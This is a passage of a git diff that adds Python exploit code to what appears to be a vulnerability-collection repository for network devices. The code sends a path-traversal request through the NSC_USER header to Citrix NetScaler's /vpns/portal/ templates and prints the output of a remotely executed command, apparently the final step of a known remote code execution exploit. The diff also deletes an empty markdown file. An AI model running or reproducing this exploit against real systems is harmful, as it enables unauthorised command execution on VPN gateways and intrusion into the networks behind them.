+      burp0_url = sys.argv[1] + "/vpns/portal/" + random_xml + ".xml"
+      burp0_headers = {"NSC_USER": "../../../../netscaler/portal/templates/" +
+                       random_xml, "NSC_NONCE": "c", "Connection": "close"}
+      r = requests.get(burp0_url, headers=burp0_headers,verify=False)
+
+      replaced = re.sub('^&#.*&#10;$', '', r.text, flags=re.MULTILINE)
+      print("[+] Result of the command: \n")
+      print(replaced)
+
+    except KeyboardInterrupt:
+            print("Exiting...")
+            break
+```
+
diff --git a/网络设备漏洞/Untitled.md b/网络设备漏洞/Untitled.md
deleted file mode 100644
index e69de29..0000000